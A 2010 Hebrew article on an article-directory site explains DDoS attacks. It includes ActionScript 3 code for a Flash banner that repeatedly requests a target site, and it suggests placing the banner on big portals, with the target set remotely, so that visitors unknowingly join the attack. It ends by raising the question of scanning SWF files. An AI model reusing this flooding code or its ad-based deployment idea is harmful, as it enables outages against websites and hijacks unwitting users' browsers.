שובר לפרסום בגוגל



התקפת DDoS באמצעות פלאש

PDF הדפסה דוא
דירוג משתמש: / 0
גרועהכי טוב 
השיעור נכתב על ידי : אלעד כהן   
ראשון, 15 אוגוסט 2010 22:56

התקפת DDoS (Distributed Denial of Service) הינה התקפה המבוצעת ע"י מספר גדול של גורמים (לדוגמא: מחשבים שונים באינטרנט) על גורם מסויים אחד (לדוגמא: אתר אינטרנט).
מטרת התקיפה היא לגרום להשבתת פעילות הגורם (לדוגמא: מניעה מאתר מסויים לתת שירות לגולשיו), בהמשך אפרט איך ניתן מקובץ פלאש בלתי-מזיק לכאורה ליצור התקפה מאסיבית על אתרי אינטרנט.


התקפות DDoS מבוצעות ע"י ניצול המשאבים של הגורם המותקף כך שמשאביו של הגורם המותקף לא יהיו פנויים עבור משתמשים רגילים, לדוגמא כשהדפדפן מבקש עמוד מסויים מאתר אינטרנט, השרת בו נמצא האתר מעבד את הבקשה ולאחר מכן שולח את העמוד לגולש אשר ביקש אותו. במידה והשרת יקבל כמות פניות אדירה, רכיבי החומרה והתוכנה שבו לא יוכלו לעמוד בעומס ופשוט יקרסו, זוהי תוצאה של התקפת DoS או DDoS, בעל האתר יכול להתקין הגנות בין מי שמנסה להתקיף את האתר לבין השרת בו מותקן האתר, כגון: רכיבי חומרה או תוכנה שיודעים לזהות התקפות, לעמוד בעומס כבד ולסנן את הבקשות הזדוניות לפני שהן מגיעות לאתר.

באפליקציית פלאש (קובץ SWF) אפשר לבצע קריאות לכתובת אינטרנט בפרוטוקול http ע"י שימוש במחלקה URLRequest.
ע"י קריאות חוזרות ונישנות למחלקה זו אפשר לטעון עמודי אינטרנט של אתר מסויים שוב ושוב. פעולה זו ממחשב אחד לא תגרום לקריסת האתר ולא תפגע בביצועיו, אבל מה יקרה אם קוד זה יהיה קיים בתוך באנר פלאש שמוצג בפורטל גדול ?
כל הגולשים שייראו את הבאנר, יהפכו להיות כלים בהתקפת DDoS ללא ידיעתם.

קוד לדוגמא בשפת אקשן-סקריפט 3
package
{
import flash.display.*;
import flash.events.*;
import flash.net.*;

public class DDoS extends MovieClip
{
public var Url:String = "http://www.website.com"; 
public var UrlLoader:URLLoader = new URLLoader();

public function DDoS() 
{
UrlLoader.addEventListener(Event.COMPLETE, Loop);

Loop();
}

private function Loop(e:Event=null):void
{
UrlLoader.load(new URLRequest(Url));
}}}

אם כתובת האתר המותקף (מוגדרת במשתנה Url) תיטען באופן דינאמי מכתובת באינטרנט אז יהיה אפשר לשנות את כתובת האתר המותקף מרחוק ללא שינוי בקובץ ה-SWF.

האם הפורטלים הגדולים בודקים את הקוד של קבצי ה-SWF המוצגים לגולשים ?
האם יש כלי אוטומטי שבודק קבצי SWF ומחפש קוד עויין ? (רעיון לסטארט אפ)
 


www.win.co.il
 
מאמרים נוספים :

» התועלת בניהול סיכונים - אבטחת מידע

התועלת בניהול סיכונים - אבטחת מידעניהול סיכונים בארגון הוא תהליך העוסק במתן פתרונות לצורך יצירת תשתית אפקטיבית וארוכת טווח, להגנת הארגון מפני סיכונים, תוך יישום מדיניות ונהלים. ניהול סיכונים מאפשר לחברות לזהות נזקים...

» רשתות חברתיות – איום קיומי על העסק שלך

 כותב המאמר: אלדד גפני, מנהל שיווק בחברת ספקטרונט רשתות חברתיות, אתרי חדשות, אתרי פנאי, מצלמות גני ילדים... אלו הן דוגמאות בודדות מתוך רשימה ארוכה המעסיקה עובדים במשך שעות העבודה. גלישה באתרים אלו גוזלת מהעובדים שעות...

» למצוא קורס פלאש למתחילים בנהריה

לא מצליחים להתקבל לאוניברסיטה? לא חובה תואר בשביל להצליח. לא חשוב אם השתחררתם כרגע מהצבא, או פתאום הגעתם אל גיל העמידה, מתחבטים, לא צריך להתבאס ולשבור את הכלים. קיימים בעידן זה מגוון עצום של קורסים מקצועיים שיאירו את...

» עשה ואל תעשה - אבטחת מידע לגולש המתחיל

גולשי אינטרנט רבים אינם מודעים לסכנות האורבות ברשת. רק לא מזמן התוודעו גולשי ישראל הרבים על המשמעות במתן כרטיסי אשראי לאתרי רכישה באינטרנט שאינם מאובטחים מספיק. על מנת שנוכל לגלוש בבטחה בדפי האינטרנט האינסופיים יש מספר...

» איך לבחור קורס לימוד פוטושופ איכותי?

לא יכולים יותר עם האוניברסיטה? לא חסרות אלטרנטיבות. אפילו אם השתחררתם לאחרונה מהצבא, או פתאום מצאתם עצמכם בגיל 40, מתים לשינוי, אסור לכם להתבאס על עצמכם ולהישבר. לא חסרים בעידן זה מבחר גדול של מקצועות אשר יעשירו אתכם...

» מתלבט אם ללמוד לימודי אנימציה?

לא יכולים יותר עם האוניברסיטה? יש הרבה אלטרנטיבות. גם אם הרגע השתחררתם, או פתאום מצאתם שאתם בגיל 30, מתים לשנות משהו, אין לכם ממה להתבאס ולהיכנס לדכאון. קיימים בשנות האלפיים הרבה תחומי לימוד שיספקו עניין ומהם תקבלו כיוון...

» ניהול ושליטה מרכזית במחשבים ניידים וטלפוני חכמים הפועלים מחוץ למטריית האבטחה הארגונית

התקדמות מהירה של טכנולוגיית האינטרנט, מיחשוב נישא וטלפונים חכמים משנים במהירות את סביבת העובדה. מערכת המיחשוב מתרחבת ומתפרסת, בתחומי האירגון וגם מחוץ לתחומו, בבית, ברכב, במלון ובחו"ל. התלות במערכות המיחשוב גדלה ובהתאמה...

» אבטחת מידע טכנולוגי באמצעות מחשוב ענן

מחשוב ענן מאז המצאת האינטרנט, יותר ויותר מערכות ותוכנות הופכות את התקנתן על המחשב למיותרת. כמעט כל תוכנה ניתן למצוא באינטרנט תוך שימוש בה ללא התקנתה הישירה על המחשב. גם מאפשר לנו גיבוי ושמירה של קבצים שונים ברשת במקום...

» האם הילדים שלכם משוגעים על משחקי מחשב?

האם הילדים שלכם משוגעים על משחקי מחשב? אם אתם לא חיים בבועה, אז קרוב לוודאי שכן. ואם יש לכם חברים שגם הם הורים לילדים בגילאים של ילדיכם – או בוגרים יותר - אז ככל הנראה כבר הספקתם להתוודע לתופעה. משחקי מחשב הם בין הבילויים...

» מיקור חוץ

בעידן הגלובלי, מערכת יחסי העבודה הקלאסית שבין עובד למעביד הולכת ונעלמת. בעידן שבו ארגונים וחברות שואפים להגיע ליעילות כלכלית ולהשיג גמישות ניהולית, נכנסו לשוק העבודה צורות העסקה חדשות, החורגות ממודל קלאסי זה. אחת...
STU2

רוצים להוסיף מאמר לאתר? הרשמו עכשיו והכניסו מאמר חדש

חיפוש מהיר בגוגל

מאמרים - כל הזכויות שמורות לפרסום אתרים באינטרנט מבית אקטיביטק בע"מ קידום אתרים